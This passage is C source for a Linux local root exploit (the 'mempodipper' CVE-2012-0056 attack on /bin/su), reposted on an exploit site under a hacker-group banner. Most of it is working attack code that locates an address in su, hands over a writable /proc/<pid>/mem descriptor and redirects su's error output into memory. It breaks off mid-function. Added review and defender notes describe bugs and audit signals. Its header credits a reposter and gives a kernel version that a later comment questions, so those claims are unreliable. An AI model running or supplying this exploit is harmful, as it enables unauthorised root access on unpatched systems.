[COLOR=#000000][COLOR=#FF8000]/*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 1
* 0 [+] Site : 1337day.com 0
* 1 [+] Support e-mail : submit[at]1337day.com 1
* 0 0
* 1 ######################################### 1
* 0 I'm Angel Injection member from Inj3ct0r Team 1
* 1 ######################################### 0
* 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
* [+] Linux Kernel 2.6.18-374 Local root Exploit
* [-] Found by Angel Injection
* [-] Version: 2.6.18-374
* [-] Security -::RISK: High
* [-] platforms: linux
* [-] http://1337day.com http://r00tw0rm.com http://i313.cc
* [-] Note: Original exploit source: http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
/* argv[0] of the running binary.  Set once in main(); reused by parent()
 * when it re-executes itself via /proc/self/exe, and in the usage text
 * printed by find_address(). */
[/COLOR][COLOR=#0000BB]char [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700];
/*
 * send_fd: pass the descriptor `fd` to the peer of the AF_UNIX stream
 * socket `sock` as an SCM_RIGHTS ancillary record, carrying one zero byte
 * of ordinary payload so the message is not empty.
 *
 * Returns 0 after a successful send (and closes `sock`), or -1 when
 * sendmsg() did not transmit exactly the one payload byte (`sock` is left
 * open on that path).  The peer is expected to collect the descriptor
 * with recv_fd().
 */
int send_fd(int sock, int fd)
{
	char payload[1] = { 0 };
	struct iovec vec = { .iov_base = payload, .iov_len = sizeof payload };
	char ancillary[CMSG_SPACE(sizeof(int))];
	struct msghdr hdr;
	struct cmsghdr *rights;
	ssize_t sent;

	memset(&hdr, 0, sizeof hdr);
	hdr.msg_iov = &vec;
	hdr.msg_iovlen = 1;
	hdr.msg_control = ancillary;
	hdr.msg_controllen = CMSG_LEN(sizeof(int));

	/* Exactly one SCM_RIGHTS record holding a single int: the descriptor. */
	rights = CMSG_FIRSTHDR(&hdr);
	rights->cmsg_len = CMSG_LEN(sizeof(int));
	rights->cmsg_level = SOL_SOCKET;
	rights->cmsg_type = SCM_RIGHTS;
	memmove(CMSG_DATA(rights), &fd, sizeof(int));

	/* Anything other than the single payload byte (including -1) is a failure. */
	sent = sendmsg(sock, &hdr, 0);
	if (sent != (ssize_t)vec.iov_len)
		return -1;

	close(sock);
	return 0;
}
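/*
 * recv_fd: receive one descriptor passed by send_fd() over the AF_UNIX
 * stream socket `sock`.
 *
 * Returns the descriptor number it was installed at in this process (and
 * closes `sock`), or -1 when recvmsg() fails, the peer closed without
 * sending (0 bytes), the control data was truncated, or the message does
 * not carry a SOL_SOCKET/SCM_RIGHTS record of at least one int.  `sock`
 * is left open on the error paths, as in the original.
 *
 * The record check is new: the original dereferenced CMSG_FIRSTHDR()
 * unconditionally, which is a NULL dereference when a message with no
 * ancillary data arrives, and would have read any other record type as a
 * descriptor number.
 */
int recv_fd(int sock)
{
	ssize_t n;
	int fd;
	char buf[1];
	struct iovec iov;
	struct msghdr msg;
	struct cmsghdr *cmsg;
	char cms[CMSG_SPACE(sizeof(int))];

	iov.iov_base = buf;
	iov.iov_len = 1;
	memset(&msg, 0, sizeof msg);
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = cms;
	msg.msg_controllen = sizeof cms;

	n = recvmsg(sock, &msg, 0);
	if (n < 0)
		return -1;
	if (n == 0)
		return -1;		/* peer closed before sending anything */
	if (msg.msg_flags & MSG_CTRUNC)
		return -1;		/* control buffer too small: fd would be lost */

	/* Only accept a well-formed SCM_RIGHTS record; anything else is not an fd. */
	cmsg = CMSG_FIRSTHDR(&msg);
	if (cmsg == NULL
	    || cmsg->cmsg_level != SOL_SOCKET
	    || cmsg->cmsg_type != SCM_RIGHTS
	    || cmsg->cmsg_len < CMSG_LEN(sizeof(int)))
		return -1;

	memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
	close(sock);
	return fd;
}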
/*
 * ptrace_address: locate at run time the address of the PLT-style jump
 * that /bin/su reaches right after it has printed its error for an
 * unknown user, without reading the binary from disk.
 *
 * Mechanism as written below: create a pipe and fork.  The child asks to
 * be traced (PTRACE_TRACEME), points its stderr at the pipe and execs
 * /bin/su with a bogus user name.  The parent resumes the child one
 * syscall at a time (PTRACE_SYSCALL) until a byte shows up on the pipe,
 * then single-steps it and returns the first instruction pointer below
 * `upper_bound` whose low two bytes are ff 25 (jmp r/m32, the shape of a
 * PLT stub).  find_address() calls this first and falls back to objdump;
 * its message says the target is exit@plt, which is an inference about
 * su rather than something this function verifies.
 *
 * Returns: the matched address from the tracer branch, or 0 from the
 * child branch when PTRACE_TRACEME fails or execl() returns.  The tracer
 * loop has no exit other than a match: if the tracee dies first the
 * parent spins on failing ptrace()/wait() calls.  pipe() and fork()
 * results are unchecked; fork() == -1 is treated as the tracer branch.
 *
 * Defender note: the observable footprint is an unprivileged process
 * tracing and single-stepping a setuid binary; audit rules on ptrace()
 * and on execve of setuid binaries under a tracer will surface it.
 */
[/COLOR][COLOR=#0000BB]unsigned long ptrace_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]int fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Creating ptrace pipe.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pipe[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
/* Read end non-blocking so the read() in the tracer loop polls instead of hanging. */
[/COLOR][COLOR=#0000BB]fcntl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]F_SETFL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]O_NONBLOCK[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Forking ptrace child.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]int child [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fork[/COLOR][COLOR=#007700]();
/* Tracer branch (also entered when fork() fails with -1). */
if ([/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]char buf[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Waiting for ptraced child to give output on syscalls.\n"[/COLOR][COLOR=#007700]);
/* Phase 1: advance syscall by syscall until su has written something to stderr (the pipe). */
for (;;) {
[/COLOR][COLOR=#0000BB]wait[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]read[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]], &[/COLOR][COLOR=#0000BB]buf[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]) > [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])
break;
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_SYSCALL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Error message written. Single stepping to find address.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]struct user_regs_struct regs[/COLOR][COLOR=#007700];
/* Phase 2: single-step and inspect the instruction at each stop.  No exit other than a match. */
for (;;) {
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_SINGLESTEP[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]wait[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_GETREGS[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], &[/COLOR][COLOR=#0000BB]regs[/COLOR][COLOR=#007700]);
/* Per-ABI register name and hard-coded address ceiling.  The ceiling is presumably
 * meant to exclude shared-library mappings so the match is su's own PLT rather
 * than libc's — TODO confirm; it is not derived from the process's maps. */
[/COLOR][COLOR=#FF8000]#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
[/COLOR][COLOR=#007700]if ([/COLOR][COLOR=#0000BB]instruction_pointer [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]upper_bound[/COLOR][COLOR=#007700]) {
/* Only the low two bytes of the peeked word are examined (ff 25 = jmp r/m32). */
[/COLOR][COLOR=#0000BB]unsigned long instruction [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_PEEKTEXT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]instruction_pointer[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
if (([/COLOR][COLOR=#0000BB]instruction [/COLOR][COLOR=#007700]& [/COLOR][COLOR=#0000BB]0xffff[/COLOR][COLOR=#007700]) == [/COLOR][COLOR=#0000BB]0x25ff [/COLOR][COLOR=#FF8000]/* jmp r/m32 */[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]instruction_pointer[/COLOR][COLOR=#007700];
}
}
} else {
/* Tracee branch.  NOTE(review): a traced exec of a setuid binary normally runs
 * without the elevated privileges, which is presumably why su can be stepped
 * here; this code does not check it. */
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Ptrace_traceme'ing process.\n"[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_TRACEME[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]) < [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] ptrace"[/COLOR][COLOR=#007700]);
/* Returning 0 here happens in the forked child, whose caller then carries on
 * as if it were the original process while the tracer is still in its loop. */
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
/* stderr -> pipe write end, then run su with an unknown user so it prints an
 * error and exits.  If execl() fails the child falls through to `return 0`. */
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"not-a-valid-user"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
/*
 * objdump_address: fallback resolver used by find_address().  Shells out
 * to objdump via popen() and extracts the address of the first <exit@plt>
 * line in the disassembly of /bin/su.  The sed step strips leading zeros
 * and prefixes "0x"; strtoul(..., 16) accepts that form.
 *
 * Returns the parsed address, or 0 when popen() fails.
 *
 * Caveat: the fgets() result is not checked.  If the pipeline prints
 * nothing (objdump not installed, symbol absent, su built differently),
 * `result` is left uninitialised and strtoul() parses stack garbage;
 * find_address() only rejects 0 and ULONG_MAX.  The popen() command is a
 * fixed string — no user-controlled input reaches the shell.
 */
[/COLOR][COLOR=#0000BB]unsigned long objdump_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]FILE [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]command [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]popen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
if (![/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] popen"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]char result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700]];
/* Unchecked: on an empty pipeline `result` stays uninitialised. */
[/COLOR][COLOR=#0000BB]fgets[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]strtoul[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]16[/COLOR][COLOR=#007700]);
}
/*
 * find_address: resolve the address parent() needs.  Tries the
 * ptrace-based probe (ptrace_address) first, then the objdump fallback
 * (objdump_address), and exits with -1 plus a usage hint for the manual
 * `-o ADDRESS` option when both fail.
 *
 * Returns the address, always non-zero; does not return on failure.  The
 * ULONG_MAX check catches strtoul() overflow from objdump_address().
 *
 * NOTE(review): when ptrace_address() returns 0 it does so from its
 * forked child (ptrace failure or failed execl), so the fallback below
 * then runs in that child while the original process is still in the
 * tracer loop.
 */
[/COLOR][COLOR=#0000BB]unsigned long find_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Ptracing su to find next instruction without reading binary.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]unsigned long address [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]ptrace_address[/COLOR][COLOR=#007700]();
if (![/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Ptrace failed.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Reading su binary with objdump to find exit@plt.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]objdump_address[/COLOR][COLOR=#007700]();
/* 0: popen failed or parsed nothing; ULONG_MAX: strtoul overflow. */
if ([/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]== [/COLOR][COLOR=#0000BB]ULONG_MAX [/COLOR][COLOR=#007700]|| ![/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700]);
exit(-[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]);
}
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Resolved call address to 0x%lx.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700];
}
/*
 * su_padding: run `/bin/su this-user-does-not-exist` through popen() with
 * stderr merged into stdout, read the first line su prints, and return
 * the byte offset at which the user name appears in that line.  parent()
 * subtracts this value from the target address so that the argument su
 * echoes back in its error message lands at the address (see parent()).
 *
 * Returns the offset as an int.  Calls exit(1) if popen() fails.
 *
 * Caveats: the fgets() result is unchecked (an empty read leaves `result`
 * uninitialised), and strstr() returning NULL — a su build or locale
 * whose first line does not echo the name — makes the pointer
 * subtraction below undefined behaviour instead of a clean failure.
 */
[/COLOR][COLOR=#0000BB]int su_padding[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Calculating su padding.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]FILE [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]command [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]popen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su this-user-does-not-exist 2>&1"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
if (![/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] popen"[/COLOR][COLOR=#007700]);
exit([/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]);
}
[/COLOR][COLOR=#0000BB]char result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700]];
/* Unchecked: only the first line is read, and it may be empty. */
[/COLOR][COLOR=#0000BB]fgets[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
/* Offset of the echoed name within the line; UB if strstr() finds nothing. */
return [/COLOR][COLOR=#0000BB]strstr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"this-user-does-not-exist"[/COLOR][COLOR=#007700]) - [/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700];
}
/*
 * child: the `-c SOCK` mode of this program (dispatched from main()).  It
 * runs as a separately exec'd process whose parent is the process that
 * will later exec /bin/su (see parent()).  It opens the parent's
 * /proc/<ppid>/mem read-write and hands the descriptor back over the
 * AF_UNIX socket `sock` with send_fd().
 *
 * Returns 1 if open() fails, 0 otherwise; the send_fd() result is
 * ignored.
 *
 * This open() is the primitive behind CVE-2012-0056 (link in the file
 * header): per that write-up, on an affected kernel the write permission
 * granted here is not re-evaluated after the parent's setuid exec.
 * NOTE(review): a kernel carrying the fix rejects the later write —
 * confirm exact affected versions against the advisory rather than the
 * version quoted in this file's header.
 *
 * Defender note: an unprivileged process opening another process's
 * /proc/<pid>/mem with write access is rare in normal operation and is a
 * useful audit signal (open/openat on a /proc/<pid>/mem path with write
 * flags from a non-root uid).
 */
[/COLOR][COLOR=#0000BB]int child[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int sock[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]char parent_mem[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]sprintf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"/proc/%d/mem"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]getppid[/COLOR][COLOR=#007700]());
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Opening parent mem %s in child.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700]);
/* Opened for writing by a process other than the one that will exec su. */
[/COLOR][COLOR=#0000BB]int fd [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]open[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]O_RDWR[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]fd [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] open"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Sending fd %d to parent.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
/* Return value ignored: a failed transfer surfaces only as recv_fd() < 0 in the parent. */
[/COLOR][COLOR=#0000BB]send_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
/*
 * parent: orchestrates the write into the memory of the su process.
 *
 * Flow as written below: create an AF_UNIX socketpair and fork.  The
 * forked half re-executes this binary via /proc/self/exe in `-c SOCK`
 * mode, i.e. child(), which opens this process's /proc/<pid>/mem and
 * passes the descriptor back.  This half receives it with recv_fd(),
 * stashes the real stderr at the hard-coded fd 15, makes the mem fd the
 * new stderr, seeks it to `address - su_padding()`, and execs /bin/su
 * with the shellcode bytes as the user-name argument.  su's error
 * message for an unknown user, which echoes that argument (see
 * su_padding()), is therefore written through stderr into the exec'd
 * process's own memory so that the argument starts at `address`.
 *
 * Parameter: address — the location resolved by find_address() or given
 * with `-o`.
 * Returns 1 on socketpair()/recv_fd() failure; 0 only if one of the
 * execl() calls returns (i.e. failed).  dup2() and lseek64() results are
 * unchecked; fork() == -1 is treated as the receiving branch.
 *
 * NOTE(review): this depends on the mem descriptor's write permission
 * having been settled before the setuid exec — the regression tracked as
 * CVE-2012-0056 (link in the file header).  The mitigation is a kernel
 * with that fix; the exec of su with a binary-looking argv[1] and the
 * preceding /proc/<pid>/mem open are the host-level signals to look for.
 */
[/COLOR][COLOR=#0000BB]int parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]unsigned long address[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]int sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Opening socketpair.\n"[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]socketpair[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]AF_UNIX[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]SOCK_STREAM[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700]) < [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] socketpair"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
/* Receiving branch (also entered if fork() fails with -1). */
if ([/COLOR][COLOR=#0000BB]fork[/COLOR][COLOR=#007700]()) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Waiting for transferred fd in parent.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]int fd [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]recv_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Received fd at %d.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]fd [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] recv_fd"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Assigning fd %d to stderr.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
/* Keep the original stderr reachable at fd 15 (magic number, unchecked), then
 * make the mem descriptor fd 2 so su's stderr output goes into memory. */
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]15[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]);
/* su_padding() runs after the redirection; its popen() merges su's stderr
 * into the pipe with "2>&1", so it is unaffected by fd 2 now being the mem fd. */
